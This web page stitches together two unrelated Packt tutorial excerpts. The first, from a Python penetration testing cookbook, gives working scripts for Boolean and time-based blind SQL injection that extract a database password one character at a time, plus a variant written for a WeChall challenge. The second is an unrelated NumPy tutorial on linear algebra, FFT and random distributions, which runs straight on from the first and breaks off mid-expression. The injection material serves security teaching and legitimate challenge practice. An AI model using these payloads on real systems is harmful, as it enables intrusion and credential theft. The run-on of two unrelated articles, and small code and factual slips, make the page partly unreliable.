
SQL Injection

Packt
23 Jun 2015
11 min read
In this article by Cameron Buchanan, Terry Ip, Andrew Mabbitt, Benjamin May, and Dave Mound, authors of the book Python Web Penetration Testing Cookbook, we're going to create scripts that encode attack strings, perform attacks, and time normal actions so that attack times can be normalized. (For more resources related to this topic, see here.)

Exploiting Boolean SQLi

There are times when all you can get from a page is a yes or no. It's heartbreaking until you realise that that's the SQL equivalent of saying "I LOVE YOU". All SQLi can be broken down into yes or no questions, depending on how patient you are. We will create a script that takes a yes value and a URL, and returns results based on a predefined attack string. I have provided an example attack string, but this will change depending on the system you are testing.

How to do it…

The following script is how yours should look:

import requests
import sys

yes = sys.argv[1]

i = 1
asciivalue = 1

answer = []
print "Kicking off the attempt"

payload = {'injection': '\'AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}

while True:
    req = requests.post('<target url>', data=payload)
    lengthtest = req.text
    if yes in lengthtest:
        length = i
        break
    else:
        i = i+1

for x in range(1, length):
    while asciivalue < 126:
        payload = {'injection': '\'AND (substr(password, '+str(x)+', 1)) = '+chr(asciivalue)+';#', 'Submit': 'submit'}
        req = requests.post('<target url>', data=payload)
        if yes in req.text:
            answer.append(chr(asciivalue))
            break
        else:
            asciivalue = asciivalue + 1
            pass
    asciivalue = 1

print "Recovered String: "+ ''.join(answer)

How it works…

First, the user must identify a string that occurs only when the SQLi is successful. Alternatively, the script may be altered to respond to the absence of proof of a failed SQLi. We provide this string as a sys.argv. We also create the two iterators we will use in this script and set them to 1, as MySQL starts counting from 1 instead of 0 like the failed system it is. Finally, we create an empty list for our future answer and tell the user that the script is starting:

yes = sys.argv[1]

i = 1
asciivalue = 1
answer = []
print "Kicking off the attempt"

Our payload here basically requests the length of the password we are attempting to return and compares it to a value that will be iterated:

payload = {'injection': '\'AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}

We then repeat the next loop forever, as we have no idea how long the password is. We submit the payload to the target URL in a POST request:

while True:
    req = requests.post('<target url>', data=payload)

Each time, we check whether the yes value we set originally is present in the response text and, if so, we end the while loop, setting the current value of i as the parameter length. The break command is the part that ends the while loop:

    lengthtest = req.text
    if yes in lengthtest:
        length = i
        break

If we don't detect the yes value, we add one to i and continue the loop:

    else:
        i = i+1

Using the identified length of the target string, we iterate through each character position and, using its ASCII value, through each possible value of that character. For each value, we submit a request to the target URL. Because the printable ASCII table only runs up to 127, we cap the loop to run until the ASCII value reaches 126. If it reaches 127, something has gone wrong:

for x in range(1, length):
    while asciivalue < 126:
        payload = {'injection': '\'AND (substr(password, '+str(x)+', 1)) = '+chr(asciivalue)+';#', 'Submit': 'submit'}
        req = requests.post('<target url>', data=payload)

We check whether our yes string is present in the response and, if so, break to move on to the next character. We append the successful value to our answer in character form, converting it with the chr command:

        if yes in req.text:
            answer.append(chr(asciivalue))
            break

If the yes value is not present, we add one to asciivalue to move on to the next potential character for that position and pass:

        else:
            asciivalue = asciivalue + 1
            pass

Finally, we reset asciivalue for each loop and, when the loop hits the length of the string, we finish, printing the whole recovered string:

    asciivalue = 1

print "Recovered String: "+ ''.join(answer)

There's more…

This script could potentially be altered to iterate through tables and recover multiple values through better-crafted SQL injection strings. Ultimately, it provides a base plate, as does the later Blind SQL Injection script, for developing more complicated and impressive scripts to handle challenging tasks. See the Blind SQL Injection script for an advanced implementation of these concepts.
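The character loop above walks the printable ASCII range linearly, which can mean close to a hundred requests per recovered character. The same yes/no oracle can drive a much cheaper search; the following is a minimal sketch of a binary-search variant, assuming the same injectable 'injection' parameter and 'Submit' field as the recipe. The target URL, the oracle string, and the recover_char helper name are illustrative, not part of the book's code:

import requests

def recover_char(url, yes, position, cookies=None):
    # Binary search over printable ASCII (32-126) using a 'greater than' oracle
    # instead of testing each candidate value for equality.
    low, high = 32, 126
    while low < high:
        mid = (low + high) // 2
        payload = {'injection': '\'AND ord(substr(password, ' + str(position) + ', 1)) > ' + str(mid) + ';#',
                   'Submit': 'submit'}
        req = requests.post(url, data=payload, cookies=cookies)
        if yes in req.text:      # the character lies above mid
            low = mid + 1
        else:                    # the character is mid or below
            high = mid
    return chr(low)

# Hypothetical usage, reusing the length recovered by the first loop:
# print(''.join(recover_char('<target url>', 'Welcome back', i) for i in range(1, length + 1)))

Roughly seven requests per character replace up to ninety-five, which matters when every request has to cross a slow link or a rate limiter.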
Exploiting Blind SQL Injection

Sometimes life hands you lemons; Blind SQL Injection points are some of those lemons. When you're reasonably sure you've found an SQL injection vulnerability, but there are no errors and you can't get it to return your data, you can use timing commands within SQL to make the page pause before returning a response, and then use that timing to make judgements about the database and its data.

We will create a script that makes requests to the server and receives differently timed responses depending on the characters it's requesting. It will then read those times and reassemble strings.

How to do it…

The script is as follows:

import requests

times = []
print "Kicking off the attempt"
cookies = {'cookie name': 'Cookie value'}

payload = {'injection': '\'or sleep(char_length(password));#', 'Submit': 'submit'}
req = requests.post('<target url>', data=payload, cookies=cookies)
firstresponsetime = int(req.elapsed.total_seconds())

for x in range(1, firstresponsetime):
    payload = {'injection': '\'or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'}
    req = requests.post('<target url>', data=payload, cookies=cookies)
    responsetime = int(round(req.elapsed.total_seconds()))
    a = chr(responsetime)
    times.append(a)
    answer = ''.join(times)

print "Recovered String: "+ answer

How it works…

As ever, we import the required libraries and declare the list we need to fill later on. We also print a message to say that the script has indeed started; with time-based functions like these, the user can be left waiting a while. In this script, I have also included cookies via the requests library, since it is likely that this sort of attack will require authentication:

times = []
print "Kicking off the attempt"
cookies = {'cookie name': 'Cookie value'}

We set up our payload in a dictionary along with a submit button. The attack string is simple enough to understand with a little explanation. The initial tick has to be escaped to be treated as text within the dictionary. That tick breaks the original SQL command and allows us to input our own SQL commands. Next, with OR, we say that if the first command fails, the following command should be performed. We then tell the server to sleep one second for every character in the first row of the password column. Finally, we close the statement with a semicolon and comment out any trailing characters with a hash (or pound, if you're American and/or wrong):

payload = {'injection': '\'or sleep(char_length(password));#', 'Submit': 'submit'}

We then store the length of time the server took to respond as the firstresponsetime parameter. We will use it to work out how many characters we need to brute-force through this method in the following chain:

firstresponsetime = int(req.elapsed.total_seconds())

We create a loop that sets x to each number from 1 to the length identified and performs an action for each one. We start from 1 here because MySQL starts counting from 1, rather than from zero like Python:

for x in range(1, firstresponsetime):

We make a payload similar to the one before, but this time we are saying: sleep for the ASCII value of character x of the password in the password column, row one. So, if the first character is a lowercase a, the corresponding ASCII value is 97 and the system sleeps for 97 seconds; if it is a lowercase b, it sleeps for 98 seconds, and so on:

    payload = {'injection': '\'or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'}

We submit our data for each character position in the string:

    req = requests.post('<target url>', data=payload, cookies=cookies)

We take the response time of each request to record how long the server slept, and then convert that time back from an ASCII value into a letter:

    responsetime = int(round(req.elapsed.total_seconds()))
    a = chr(responsetime)

On each iteration, we join together the characters recovered so far, so that once the loop ends we can print out the full password:

    times.append(a)
    answer = ''.join(times)

print "Recovered String: "+ answer
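The elapsed times measured above include ordinary network latency and page-processing time as well as the injected sleep(), which is why the introduction to this article talks about timing normal actions to normalize attack times. Here is a minimal sketch of how a baseline could be estimated and subtracted before a timing is converted back into a character; the baseline_seconds helper, the benign test payload, and the sample count are illustrative assumptions rather than part of the recipe:

import requests

def baseline_seconds(url, cookies, samples=5):
    # Time a few requests with a harmless payload to estimate normal response latency.
    benign = {'injection': 'test', 'Submit': 'submit'}
    timings = []
    for _ in range(samples):
        req = requests.post(url, data=benign, cookies=cookies)
        timings.append(req.elapsed.total_seconds())
    return sum(timings) / len(timings)

# Hypothetical usage against the same target as the recipe:
# base = baseline_seconds('<target url>', {'cookie name': 'Cookie value'})
# req = requests.post('<target url>', data=payload, cookies={'cookie name': 'Cookie value'})
# seconds_slept = req.elapsed.total_seconds() - base
# print(chr(int(round(seconds_slept))))

The Wechall adaptation shown next does something similar, subtracting a fixed benchmark of 15 hundredths of a second from every measurement.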
There's more…

This script provides a framework that can be adapted to many different scenarios. Wechall, the web app challenge website, sets a time-limited blind SQLi challenge that has to be completed in a very short time period. The following is our original script adapted to this environment. As you can see, I've had to account for smaller time differences between values and for server lag, and I've also incorporated a checking method that resets the testing value each time and submits the answer automatically:

import subprocess
import requests

def round_down(num, divisor):
    return num - (num%divisor)

subprocess.Popen(["modprobe pcspkr"], shell=True)
subprocess.Popen(["beep"], shell=True)

values = {'0': '0', '25': '1', '50': '2', '75': '3', '100': '4', '125': '5', '150': '6', '175': '7', '200': '8', '225': '9', '250': 'A', '275': 'B', '300': 'C', '325': 'D', '350': 'E', '375': 'F'}
times = []
answer = "This is the first time"
cookies = {'wc': 'cookie'}
setup = requests.get('http://www.wechall.net/challenge/blind_lighter/index.php?mo=WeChall&me=Sidebar2&rightpanel=0', cookies=cookies)
y=0
accum=0

while 1:
    reset = requests.get('http://www.wechall.net/challenge/blind_lighter/index.php?reset=me', cookies=cookies)
    for line in reset.text.splitlines():
        if "last hash" in line:
            print "the old hash was:"+line.split(" ")[20].strip(".</li>")
            print "the guessed hash:"+answer
            print "Attempts reset \n\n"
    for x in range(1, 33):
        payload = {'injection': '\'or IF (ord(substr(password, '+str(x)+', 1)) BETWEEN 48 AND 57,sleep((ord(substr(password, '+str(x)+', 1))-48)/4),sleep((ord(substr(password, '+str(x)+', 1))-55)/4));#', 'inject': 'Inject'}
        req = requests.post('http://www.wechall.net/challenge/blind_lighter/index.php?ajax=1', data=payload, cookies=cookies)
        responsetime = str(req.elapsed)[5]+str(req.elapsed)[6]+str(req.elapsed)[8]+str(req.elapsed)[9]
        accum = accum + int(responsetime)
        benchmark = int(15)
        benchmarked = int(responsetime) - benchmark
        rounded = str(round_down(benchmarked, 25))
        if rounded in values:
            a = str(values[rounded])
            times.append(a)
            answer = ''.join(times)
        else:
            print rounded
            rounded = str("375")
            a = str(values[rounded])
            times.append(a)
            answer = ''.join(times)
    submission = {'thehash': str(answer), 'mybutton': 'Enter'}
    submit = requests.post('http://www.wechall.net/challenge/blind_lighter/index.php', data=submission, cookies=cookies)
    print "Attempt: "+str(y)
    print "Time taken: "+str(accum)
    y += 1
    for line in submit.text.splitlines():
        if "slow" in line:
            print line.strip("<li>")
        elif "wrong" in line:
            print line.strip("<li>")
    if "wrong" not in submit.text:
        print "possible success!"
        #subprocess.Popen(["beep"], shell=True)

Summary

We looked at how to recover strings through two different attacks: Boolean SQLi and Blind SQL Injection. You will find various other kinds of attacks throughout the book.

Resources for Article:

Further resources on this subject:

Pentesting Using Python [article]
Wireless and Mobile Hacks [article]
Introduction to the Nmap Scripting Engine [article]


Moving Further with NumPy Modules

Packt
23 Jun 2015
23 min read
NumPy has a number of modules inherited from its predecessor, Numeric. Some of these packages have a SciPy counterpart, which may have fuller functionality. In this article by Ivan Idris author of the book NumPy: Beginner's Guide - Third Edition we will cover the following topics: The linalg package The fft package Random numbers Continuous and discrete distributions (For more resources related to this topic, see here.) Linear algebra Linear algebra is an important branch of mathematics. The numpy.linalg package contains linear algebra functions. With this module, you can invert matrices, calculate eigenvalues, solve linear equations, and determine determinants, among other things (see http://docs.scipy.org/doc/numpy/reference/routines.linalg.html). Time for action – inverting matrices The inverse of a matrix A in linear algebra is the matrix A-1, which, when multiplied with the original matrix, is equal to the identity matrix I. This can be written as follows: A A-1 = I The inv() function in the numpy.linalg package can invert an example matrix with the following steps: Create the example matrix with the mat() function: A = np.mat("0 1 2;1 0 3;4 -3 8") print("An", A) The A matrix appears as follows: A [[ 0 1 2] [ 1 0 3] [ 4 -3 8]] Invert the matrix with the inv() function: inverse = np.linalg.inv(A) print("inverse of An", inverse) The inverse matrix appears as follows: inverse of A [[-4.5 7. -1.5] [-2.   4. -1. ] [ 1.5 -2.   0.5]] If the matrix is singular, or not square, a LinAlgError is raised. If you want, you can check the result manually with a pen and paper. This is left as an exercise for the reader. Check the result by multiplying the original matrix with the result of the inv() function: print("Checkn", A * inverse) The result is the identity matrix, as expected: Check [[ 1. 0. 0.] [ 0. 1. 0.] [ 0. 0. 1.]] What just happened? We calculated the inverse of a matrix with the inv() function of the numpy.linalg package. We checked, with matrix multiplication, whether this is indeed the inverse matrix (see inversion.py): from __future__ import print_function import numpy as np   A = np.mat("0 1 2;1 0 3;4 -3 8") print("An", A)   inverse = np.linalg.inv(A) print("inverse of An", inverse)   print("Checkn", A * inverse) Pop quiz – creating a matrix Q1. Which function can create matrices? array create_matrix mat vector Have a go hero – inverting your own matrix Create your own matrix and invert it. The inverse is only defined for square matrices. The matrix must be square and invertible; otherwise, a LinAlgError exception is raised. Solving linear systems A matrix transforms a vector into another vector in a linear way. This transformation mathematically corresponds to a system of linear equations. The numpy.linalg function solve() solves systems of linear equations of the form Ax = b, where A is a matrix, b can be a one-dimensional or two-dimensional array, and x is an unknown variable. We will see the dot() function in action. This function returns the dot product of two floating-point arrays. The dot() function calculates the dot product (see https://www.khanacademy.org/math/linear-algebra/vectors_and_spaces/dot_cross_products/v/vector-dot-product-and-vector-length). 
For a matrix A and vector b, the dot product is equal to the following sum: Time for action – solving a linear system Solve an example of a linear system with the following steps: Create A and b: A = np.mat("1 -2 1;0 2 -8;-4 5 9") print("An", A) b = np.array([0, 8, -9]) print("bn", b) A and b appear as follows: Solve this linear system with the solve() function: x = np.linalg.solve(A, b) print("Solution", x) The solution of the linear system is as follows: Solution [ 29. 16.   3.] Check whether the solution is correct with the dot() function: print("Checkn", np.dot(A , x)) The result is as expected: Check [[ 0. 8. -9.]] What just happened? We solved a linear system using the solve() function from the NumPy linalg module and checked the solution with the dot() function: from __future__ import print_function import numpy as np   A = np.mat("1 -2 1;0 2 -8;-4 5 9") print("An", A)   b = np.array([0, 8, -9]) print("bn", b)   x = np.linalg.solve(A, b) print("Solution", x)   print("Checkn", np.dot(A , x)) Finding eigenvalues and eigenvectors Eigenvalues are scalar solutions to the equation Ax = ax, where A is a two-dimensional matrix and x is a one-dimensional vector. Eigenvectors are vectors corresponding to eigenvalues (see https://www.khanacademy.org/math/linear-algebra/alternate_bases/eigen_everything/v/linear-algebra-introduction-to-eigenvalues-and-eigenvectors). The eigvals() function in the numpy.linalg package calculates eigenvalues. The eig() function returns a tuple containing eigenvalues and eigenvectors. Time for action – determining eigenvalues and eigenvectors Let's calculate the eigenvalues of a matrix: Create a matrix as shown in the following: A = np.mat("3 -2;1 0") print("An", A) The matrix we created looks like the following: A [[ 3 -2] [ 1 0]] Call the eigvals() function: print("Eigenvalues", np.linalg.eigvals(A)) The eigenvalues of the matrix are as follows: Eigenvalues [ 2. 1.] Determine eigenvalues and eigenvectors with the eig() function. This function returns a tuple, where the first element contains eigenvalues and the second element contains corresponding eigenvectors, arranged column-wise: eigenvalues, eigenvectors = np.linalg.eig(A) print("First tuple of eig", eigenvalues) print("Second tuple of eign", eigenvectors) The eigenvalues and eigenvectors appear as follows: First tuple of eig [ 2. 1.] Second tuple of eig [[ 0.89442719 0.70710678] [ 0.4472136   0.70710678]] Check the result with the dot() function by calculating the right and left side of the eigenvalues equation Ax = ax: for i, eigenvalue in enumerate(eigenvalues):      print("Left", np.dot(A, eigenvectors[:,i]))      print("Right", eigenvalue * eigenvectors[:,i])      print() The output is as follows: Left [[ 1.78885438] [ 0.89442719]] Right [[ 1.78885438] [ 0.89442719]] What just happened? We found the eigenvalues and eigenvectors of a matrix with the eigvals() and eig() functions of the numpy.linalg module. 
We checked the result using the dot() function (see eigenvalues.py): from __future__ import print_function import numpy as np   A = np.mat("3 -2;1 0") print("An", A)   print("Eigenvalues", np.linalg.eigvals(A) )   eigenvalues, eigenvectors = np.linalg.eig(A) print("First tuple of eig", eigenvalues) print("Second tuple of eign", eigenvectors)   for i, eigenvalue in enumerate(eigenvalues):      print("Left", np.dot(A, eigenvectors[:,i]))      print("Right", eigenvalue * eigenvectors[:,i])      print() Singular value decomposition Singular value decomposition (SVD) is a type of factorization that decomposes a matrix into a product of three matrices. The SVD is a generalization of the previously discussed eigenvalue decomposition. SVD is very useful for algorithms such as the pseudo inverse, which we will discuss in the next section. The svd() function in the numpy.linalg package can perform this decomposition. This function returns three matrices U, ?, and V such that U and V are unitary and ? contains the singular values of the input matrix: The asterisk denotes the Hermitian conjugate or the conjugate transpose. The complex conjugate changes the sign of the imaginary part of a complex number and is therefore not relevant for real numbers. A complex square matrix A is unitary if A*A = AA* = I (the identity matrix). We can interpret SVD as a sequence of three operations—rotation, scaling, and another rotation. We already transposed matrices in this article. The transpose flips matrices, turning rows into columns, and columns into rows. Time for action – decomposing a matrix It's time to decompose a matrix with the SVD using the following steps: First, create a matrix as shown in the following: A = np.mat("4 11 14;8 7 -2") print("An", A) The matrix we created looks like the following: A [[ 4 11 14] [ 8 7 -2]] Decompose the matrix with the svd() function: U, Sigma, V = np.linalg.svd(A, full_matrices=False) print("U") print(U) print("Sigma") print(Sigma) print("V") print(V) Because of the full_matrices=False specification, NumPy performs a reduced SVD decomposition, which is faster to compute. The result is a tuple containing the two unitary matrices U and V on the left and right, respectively, and the singular values of the middle matrix: U [[-0.9486833 -0.31622777]   [-0.31622777 0.9486833 ]] Sigma [ 18.97366596   9.48683298] V [[-0.33333333 -0.66666667 -0.66666667] [ 0.66666667 0.33333333 -0.66666667]] We do not actually have the middle matrix—we only have the diagonal values. The other values are all 0. Form the middle matrix with the diag() function. Multiply the three matrices as follows: print("Productn", U * np.diag(Sigma) * V) The product of the three matrices is equal to the matrix we created in the first step: Product [[ 4. 11. 14.] [ 8.   7. -2.]] What just happened? We decomposed a matrix and checked the result by matrix multiplication. We used the svd() function from the NumPy linalg module (see decomposition.py): from __future__ import print_function import numpy as np   A = np.mat("4 11 14;8 7 -2") print("An", A)   U, Sigma, V = np.linalg.svd(A, full_matrices=False)   print("U") print(U)   print("Sigma") print(Sigma)   print("V") print(V)   print("Productn", U * np.diag(Sigma) * V) Pseudo inverse The Moore-Penrose pseudo inverse of a matrix can be computed with the pinv() function of the numpy.linalg module (see http://en.wikipedia.org/wiki/Moore%E2%80%93Penrose_pseudoinverse). The pseudo inverse is calculated using the SVD (see previous example). 
The inv() function only accepts square matrices; the pinv() function does not have this restriction and is therefore considered a generalization of the inverse. Time for action – computing the pseudo inverse of a matrix Let's compute the pseudo inverse of a matrix: First, create a matrix: A = np.mat("4 11 14;8 7 -2") print("An", A) The matrix we created looks like the following: A [[ 4 11 14] [ 8 7 -2]] Calculate the pseudo inverse matrix with the pinv() function: pseudoinv = np.linalg.pinv(A) print("Pseudo inversen", pseudoinv) The pseudo inverse result is as follows: Pseudo inverse [[-0.00555556 0.07222222] [ 0.02222222 0.04444444] [ 0.05555556 -0.05555556]] Multiply the original and pseudo inverse matrices: print("Check", A * pseudoinv) What we get is not an identity matrix, but it comes close to it: Check [[ 1.00000000e+00   0.00000000e+00] [ 8.32667268e-17   1.00000000e+00]] What just happened? We computed the pseudo inverse of a matrix with the pinv() function of the numpy.linalg module. The check by matrix multiplication resulted in a matrix that is approximately an identity matrix (see pseudoinversion.py): from __future__ import print_function import numpy as np   A = np.mat("4 11 14;8 7 -2") print("An", A)   pseudoinv = np.linalg.pinv(A) print("Pseudo inversen", pseudoinv)   print("Check", A * pseudoinv) Determinants The determinant is a value associated with a square matrix. It is used throughout mathematics; for more details, please refer to http://en.wikipedia.org/wiki/Determinant. For a n x n real value matrix, the determinant corresponds to the scaling a n-dimensional volume undergoes when transformed by the matrix. The positive sign of the determinant means the volume preserves its orientation (clockwise or anticlockwise), while a negative sign means reversed orientation. The numpy.linalg module has a det() function that returns the determinant of a matrix. Time for action – calculating the determinant of a matrix To calculate the determinant of a matrix, follow these steps: Create the matrix: A = np.mat("3 4;5 6") print("An", A) The matrix we created appears as follows: A [[ 3. 4.] [ 5. 6.]] Compute the determinant with the det() function: print("Determinant", np.linalg.det(A)) The determinant appears as follows: Determinant -2.0 What just happened? We calculated the determinant of a matrix with the det() function from the numpy.linalg module (see determinant.py): from __future__ import print_function import numpy as np   A = np.mat("3 4;5 6") print("An", A)   print("Determinant", np.linalg.det(A)) Fast Fourier transform The Fast Fourier transform (FFT) is an efficient algorithm to calculate the discrete Fourier transform (DFT). The Fourier series represents a signal as a sum of sine and cosine terms. FFT improves on more naïve algorithms and is of order O(N log N). DFT has applications in signal processing, image processing, solving partial differential equations, and more. NumPy has a module called fft that offers FFT functionality. Many functions in this module are paired; for those functions, another function does the inverse operation. For instance, the fft() and ifft() function form such a pair. Time for action – calculating the Fourier transform First, we will create a signal to transform. 
Calculate the Fourier transform with the following steps: Create a cosine wave with 30 points as follows: x = np.linspace(0, 2 * np.pi, 30) wave = np.cos(x) Transform the cosine wave with the fft() function: transformed = np.fft.fft(wave) Apply the inverse transform with the ifft() function. It should approximately return the original signal. Check with the following line: print(np.all(np.abs(np.fft.ifft(transformed) - wave)   < 10 ** -9)) The result appears as follows: True Plot the transformed signal with matplotlib: plt.plot(transformed) plt.title('Transformed cosine') plt.xlabel('Frequency') plt.ylabel('Amplitude') plt.grid() plt.show() The following resulting diagram shows the FFT result: What just happened? We applied the fft() function to a cosine wave. After applying the ifft() function, we got our signal back (see fourier.py): from __future__ import print_function import numpy as np import matplotlib.pyplot as plt     x = np.linspace(0, 2 * np.pi, 30) wave = np.cos(x) transformed = np.fft.fft(wave) print(np.all(np.abs(np.fft.ifft(transformed) - wave) < 10 ** -9))   plt.plot(transformed) plt.title('Transformed cosine') plt.xlabel('Frequency') plt.ylabel('Amplitude') plt.grid() plt.show() Shifting The fftshift() function of the numpy.linalg module shifts zero-frequency components to the center of a spectrum. The zero-frequency component corresponds to the mean of the signal. The ifftshift() function reverses this operation. Time for action – shifting frequencies We will create a signal, transform it, and then shift the signal. Shift the frequencies with the following steps: Create a cosine wave with 30 points: x = np.linspace(0, 2 * np.pi, 30) wave = np.cos(x) Transform the cosine wave with the fft() function: transformed = np.fft.fft(wave) Shift the signal with the fftshift() function: shifted = np.fft.fftshift(transformed) Reverse the shift with the ifftshift() function. This should undo the shift. Check with the following code snippet: print(np.all((np.fft.ifftshift(shifted) - transformed)   < 10 ** -9)) The result appears as follows: True Plot the signal and transform it with matplotlib: plt.plot(transformed, lw=2, label="Transformed") plt.plot(shifted, '--', lw=3, label="Shifted") plt.title('Shifted and transformed cosine wave') plt.xlabel('Frequency') plt.ylabel('Amplitude') plt.grid() plt.legend(loc='best') plt.show() The following diagram shows the effect of the shift and the FFT: What just happened? We applied the fftshift() function to a cosine wave. After applying the ifftshift() function, we got our signal back (see fouriershift.py): import numpy as np import matplotlib.pyplot as plt     x = np.linspace(0, 2 * np.pi, 30) wave = np.cos(x) transformed = np.fft.fft(wave) shifted = np.fft.fftshift(transformed) print(np.all(np.abs(np.fft.ifftshift(shifted) - transformed) < 10 ** -9))   plt.plot(transformed, lw=2, label="Transformed") plt.plot(shifted, '--', lw=3, label="Shifted") plt.title('Shifted and transformed cosine wave') plt.xlabel('Frequency') plt.ylabel('Amplitude') plt.grid() plt.legend(loc='best') plt.show() Random numbers Random numbers are used in Monte Carlo methods, stochastic calculus, and more. Real random numbers are hard to generate, so, in practice, we use pseudo random numbers, which are random enough for most intents and purposes, except for some very special cases. These numbers appear random, but if you analyze them more closely, you will realize that they follow a certain pattern. The random numbers-related functions are in the NumPy random module. 
The core random number generator is based on the Mersenne Twister algorithm—a standard and well-known algorithm (see https://en.wikipedia.org/wiki/Mersenne_Twister). We can generate random numbers from discrete or continuous distributions. The distribution functions have an optional size parameter, which tells NumPy how many numbers to generate. You can specify either an integer or a tuple as size. This will result in an array filled with random numbers of appropriate shape. Discrete distributions include the geometric, hypergeometric, and binomial distributions. Time for action – gambling with the binomial The binomial distribution models the number of successes in an integer number of independent trials of an experiment, where the probability of success in each experiment is a fixed number (see https://www.khanacademy.org/math/probability/random-variables-topic/binomial_distribution). Imagine a 17th century gambling house where you can bet on flipping pieces of eight. Nine coins are flipped. If less than five are heads, then you lose one piece of eight, otherwise you win one. Let's simulate this, starting with 1,000 coins in our possession. Use the binomial() function from the random module for that purpose. To understand the binomial() function, look at the following section: Initialize an array, which represents the cash balance, to zeros. Call the binomial() function with a size of 10000. This represents 10,000 coin flips in our casino: cash = np.zeros(10000) cash[0] = 1000 outcome = np.random.binomial(9, 0.5, size=len(cash)) Go through the outcomes of the coin flips and update the cash array. Print the minimum and maximum of the outcome, just to make sure we don't have any strange outliers: for i in range(1, len(cash)):    if outcome[i] < 5:      cash[i] = cash[i - 1] - 1    elif outcome[i] < 10:      cash[i] = cash[i - 1] + 1    else:      raise AssertionError("Unexpected outcome " + outcome)   print(outcome.min(), outcome.max()) As expected, the values are between 0 and 9. In the following diagram, you can see the cash balance performing a random walk: What just happened? We did a random walk experiment using the binomial() function from the NumPy random module (see headortail.py): from __future__ import print_function import numpy as np import matplotlib.pyplot as plt     cash = np.zeros(10000) cash[0] = 1000 np.random.seed(73) outcome = np.random.binomial(9, 0.5, size=len(cash))   for i in range(1, len(cash)):    if outcome[i] < 5:      cash[i] = cash[i - 1] - 1    elif outcome[i] < 10:      cash[i] = cash[i - 1] + 1    else:      raise AssertionError("Unexpected outcome " + outcome)   print(outcome.min(), outcome.max())   plt.plot(np.arange(len(cash)), cash) plt.title('Binomial simulation') plt.xlabel('# Bets') plt.ylabel('Cash') plt.grid() plt.show() Hypergeometric distribution The hypergeometricdistribution models a jar with two types of objects in it. The model tells us how many objects of one type we can get if we take a specified number of items out of the jar without replacing them (see https://en.wikipedia.org/wiki/Hypergeometric_distribution). The NumPy random module has a hypergeometric() function that simulates this situation. Time for action – simulating a game show Imagine a game show where every time the contestants answer a question correctly, they get to pull three balls from a jar and then put them back. Now, there is a catch, one ball in the jar is bad. Every time it is pulled out, the contestants lose six points. 
If, however, they manage to get out 3 of the 25 normal balls, they get one point. So, what is going to happen if we have 100 questions in total? Look at the following section for the solution: Initialize the outcome of the game with the hypergeometric() function. The first parameter of this function is the number of ways to make a good selection, the second parameter is the number of ways to make a bad selection, and the third parameter is the number of items sampled: points = np.zeros(100) outcomes = np.random.hypergeometric(25, 1, 3, size=len(points)) Set the scores based on the outcomes from the previous step: for i in range(len(points)):    if outcomes[i] == 3:      points[i] = points[i - 1] + 1    elif outcomes[i] == 2:      points[i] = points[i - 1] - 6    else:     print(outcomes[i]) The following diagram shows how the scoring evolved: What just happened? We simulated a game show using the hypergeometric() function from the NumPy random module. The game scoring depends on how many good and how many bad balls the contestants pulled out of a jar in each session (see urn.py): from __future__ import print_function import numpy as np import matplotlib.pyplot as plt     points = np.zeros(100) np.random.seed(16) outcomes = np.random.hypergeometric(25, 1, 3, size=len(points))   for i in range(len(points)):    if outcomes[i] == 3:      points[i] = points[i - 1] + 1    elif outcomes[i] == 2:      points[i] = points[i - 1] - 6    else:      print(outcomes[i])   plt.plot(np.arange(len(points)), points) plt.title('Game show simulation') plt.xlabel('# Rounds') plt.ylabel('Score') plt.grid() plt.show() Continuous distributions We usually model continuous distributions with probability density functions (PDF). The probability that a value is in a certain interval is determined by integration of the PDF (see https://www.khanacademy.org/math/probability/random-variables-topic/random_variables_prob_dist/v/probability-density-functions). The NumPy random module has functions that represent continuous distributions—beta(), chisquare(), exponential(), f(), gamma(), gumbel(), laplace(), lognormal(), logistic(), multivariate_normal(), noncentral_chisquare(), noncentral_f(), normal(), and others. Time for action – drawing a normal distribution We can generate random numbers from a normal distribution and visualize their distribution with a histogram (see https://www.khanacademy.org/math/probability/statistics-inferential/normal_distribution/v/introduction-to-the-normal-distribution). Draw a normal distribution with the following steps: Generate random numbers for a given sample size using the normal() function from the random NumPy module: N=10000 normal_values = np.random.normal(size=N) Draw the histogram and theoretical PDF with a center value of 0 and standard deviation of 1. Use matplotlib for this purpose: _, bins, _ = plt.hist(normal_values,   np.sqrt(N), normed=True, lw=1) sigma = 1 mu = 0 plt.plot(bins, 1/(sigma * np.sqrt(2 * np.pi))   * np.exp( - (bins - mu)**2 / (2 * sigma**2) ),lw=2) plt.show() In the following diagram, we see the familiar bell curve: What just happened? We visualized the normal distribution using the normal() function from the random NumPy module. 
We did this by drawing the bell curve and a histogram of randomly generated values (see normaldist.py): import numpy as np import matplotlib.pyplot as plt   N=10000   np.random.seed(27) normal_values = np.random.normal(size=N) _, bins, _ = plt.hist(normal_values, np.sqrt(N), normed=True, lw=1, label="Histogram") sigma = 1 mu = 0 plt.plot(bins, 1/(sigma * np.sqrt(2 * np.pi)) * np.exp( - (bins - mu)**2 / (2 * sigma**2) ), '--', lw=3, label="PDF") plt.title('Normal distribution') plt.xlabel('Value') plt.ylabel('Normalized Frequency') plt.grid() plt.legend(loc='best') plt.show() Lognormal distribution A lognormal distribution is a distribution of a random variable whose natural logarithm is normally distributed. The lognormal() function of the random NumPy module models this distribution. Time for action – drawing the lognormal distribution Let's visualize the lognormal distribution and its PDF with a histogram: Generate random numbers using the normal() function from the random NumPy module: N=10000 lognormal_values = np.random.lognormal(size=N) Draw the histogram and theoretical PDF with a center value of 0 and standard deviation of 1: _, bins, _ = plt.hist(lognormal_values,   np.sqrt(N), normed=True, lw=1) sigma = 1 mu = 0 x = np.linspace(min(bins), max(bins), len(bins)) pdf = np.exp(-(numpy.log(x) - mu)**2 / (2 * sigma**2))/ (x *   sigma * np.sqrt(2 * np.pi)) plt.plot(x, pdf,lw=3) plt.show() The fit of the histogram and theoretical PDF is excellent, as you can see in the following diagram: What just happened? We visualized the lognormal distribution using the lognormal() function from the random NumPy module. We did this by drawing the curve of the theoretical PDF and a histogram of randomly generated values (see lognormaldist.py): import numpy as np import matplotlib.pyplot as plt   N=10000 np.random.seed(34) lognormal_values = np.random.lognormal(size=N) _, bins, _ = plt.hist(lognormal_values,   np.sqrt(N), normed=True, lw=1, label="Histogram") sigma = 1 mu = 0 x = np.linspace(min(bins), max(bins), len(bins)) pdf = np.exp(-(np.log(x) - mu)**2 / (2 * sigma**2))/ 